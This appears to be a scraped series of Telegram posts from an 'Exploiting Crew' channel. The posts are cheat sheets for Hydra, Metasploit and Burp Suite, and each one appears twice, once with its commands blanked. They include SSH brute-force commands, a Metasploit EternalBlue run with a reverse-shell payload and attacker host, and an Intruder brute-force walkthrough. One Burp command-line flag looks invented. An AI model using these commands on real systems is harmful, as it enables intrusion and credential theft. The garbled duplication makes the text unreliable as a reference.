Explanation:
-
-
---
### Example: Verbose Output
Explanation:
-
---
### Important Notes:
1. Only use Hydra on systems you are authorized to test.
2. Unauthorized brute-forcing is illegal and unethical. Always ensure compliance with laws and ethical guidelines.
Hydra is a fast and flexible login brute-forcing tool that supports numerous protocols.
---
### Basic Usage Command:
hydra -l admin -p password123 192.168.1.1 ssh
Explanation:
-
hydra: Runs the Hydra tool.-
-l admin: Specifies the username (admin).-
-p password123: Specifies the password (password123).-
192.168.1.1: Target IP address.-
ssh: Protocol to brute-force (in this case, SSH).---
### Example: Using a Password List
hydra -l admin -P /path/to/passwords.txt 192.168.1.1 ssh
Explanation:
-
-P /path/to/passwords.txt: Points to a file containing a list of potential passwords.---
### Example: Brute-Forcing with Multiple Usernames
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt 192.168.1.1 ssh
Explanation:
-
-L /path/to/usernames.txt: Specifies a file with multiple usernames.-
-P /path/to/passwords.txt: Specifies a file with potential passwords.---
### Example: Verbose Output
hydra -V -l admin -p password123 192.168.1.1 ssh
Explanation:
-
-V: Displays each login attempt in real-time.---
### Important Notes:
1. Only use Hydra on systems you are authorized to test.
2. Unauthorized brute-forcing is illegal and unethical. Always ensure compliance with laws and ethical guidelines.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Metasploit Framework
Metasploit is a powerful penetration testing framework that helps exploit vulnerabilities in systems.
---
### Basic Usage Command:
Explanation:
- Launches the Metasploit Framework console.
---
### Example: Scanning for Vulnerabilities
Explanation:
1.
2.
3.
---
### Example: Exploiting a Vulnerability
Explanation:
1.
2.
3.
4.
5.
---
### Example: Checking Exploit Options
Explanation:
- Lists all configurable options for the currently loaded module.
---
### Important Notes:
1. Always obtain explicit authorization before testing or exploiting a system.
2. Misuse of Metasploit for unauthorized purposes is illegal. Follow ethical and legal guidelines strictly.
Metasploit is a powerful penetration testing framework that helps exploit vulnerabilities in systems.
---
### Basic Usage Command:
msfconsole
Explanation:
- Launches the Metasploit Framework console.
---
### Example: Scanning for Vulnerabilities
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.1
run
Explanation:
1.
use auxiliary/scanner/http/http_version: Loads an auxiliary module to check the HTTP server version.2.
set RHOSTS 192.168.1.1: Sets the target host.3.
run: Executes the module.---
### Example: Exploiting a Vulnerability
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
run
Explanation:
1.
use exploit/windows/smb/ms17_010_eternalblue: Loads the EternalBlue exploit module.2.
set RHOST 192.168.1.1: Sets the target's IP address.3.
set PAYLOAD windows/x64/meterpreter/reverse_tcp: Specifies the payload for remote shell access.4.
set LHOST 192.168.1.100: Sets the attacker's IP for the reverse connection.5.
run: Executes the exploit.---
### Example: Checking Exploit Options
show options
Explanation:
- Lists all configurable options for the currently loaded module.
---
### Important Notes:
1. Always obtain explicit authorization before testing or exploiting a system.
2. Misuse of Metasploit for unauthorized purposes is illegal. Follow ethical and legal guidelines strictly.
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Tool: Burp Suite - Web Application Exploiting
Burp Suite is a comprehensive tool used for web vulnerability scanning and exploitation in web applications.
---
### Basic Usage Command:
Explanation:
- Launches the Burp Suite graphical interface for interaction.
---
### Example: Setting Proxy to Intercept Traffic
1. Open Burp Suite and go to the Proxy tab.
2. Set your browser’s proxy to
3. Enable Intercept to capture HTTP/S requests from the browser.
---
### Example: Scanning a Web Application for Vulnerabilities
1. Go to the Target tab in Burp Suite.
2. Add the URL of the target web application.
3. Right-click on the target URL and select "Scan" to detect common vulnerabilities such as SQL injection, XSS, etc.
---
### Example: Brute Force Attack with Intruder
1. Capture a login request using Proxy.
2. Switch to the Intruder tab and load the captured request.
3. Define the positions for the username and password fields.
4. Set the payloads to attempt different username and password combinations.
5. Click Start Attack to perform the brute-force attack.
---
### Example: Spidering a Website
Explanation:
-
---
### Important Notes:
1. Burp Suite is intended for ethical hacking, penetration testing, and vulnerability assessments.
2. Always obtain explicit permission before testing or exploiting web applications.
3. Unauthorized exploitation is illegal and against ethical guidelines.
Burp Suite is a comprehensive tool used for web vulnerability scanning and exploitation in web applications.
---
### Basic Usage Command:
burpsuite
Explanation:
- Launches the Burp Suite graphical interface for interaction.
---
### Example: Setting Proxy to Intercept Traffic
1. Open Burp Suite and go to the Proxy tab.
2. Set your browser’s proxy to
127.0.0.1:8080.3. Enable Intercept to capture HTTP/S requests from the browser.
---
### Example: Scanning a Web Application for Vulnerabilities
1. Go to the Target tab in Burp Suite.
2. Add the URL of the target web application.
3. Right-click on the target URL and select "Scan" to detect common vulnerabilities such as SQL injection, XSS, etc.
---
### Example: Brute Force Attack with Intruder
1. Capture a login request using Proxy.
2. Switch to the Intruder tab and load the captured request.
3. Define the positions for the username and password fields.
4. Set the payloads to attempt different username and password combinations.
5. Click Start Attack to perform the brute-force attack.
---
### Example: Spidering a Website
burpsuite -spider https://example.com
Explanation:
-
-spider https://example.com: Automatically crawls and maps the website to identify all accessible URLs.---
### Important Notes:
1. Burp Suite is intended for ethical hacking, penetration testing, and vulnerability assessments.
2. Always obtain explicit permission before testing or exploiting web applications.
3. Unauthorized exploitation is illegal and against ethical guidelines.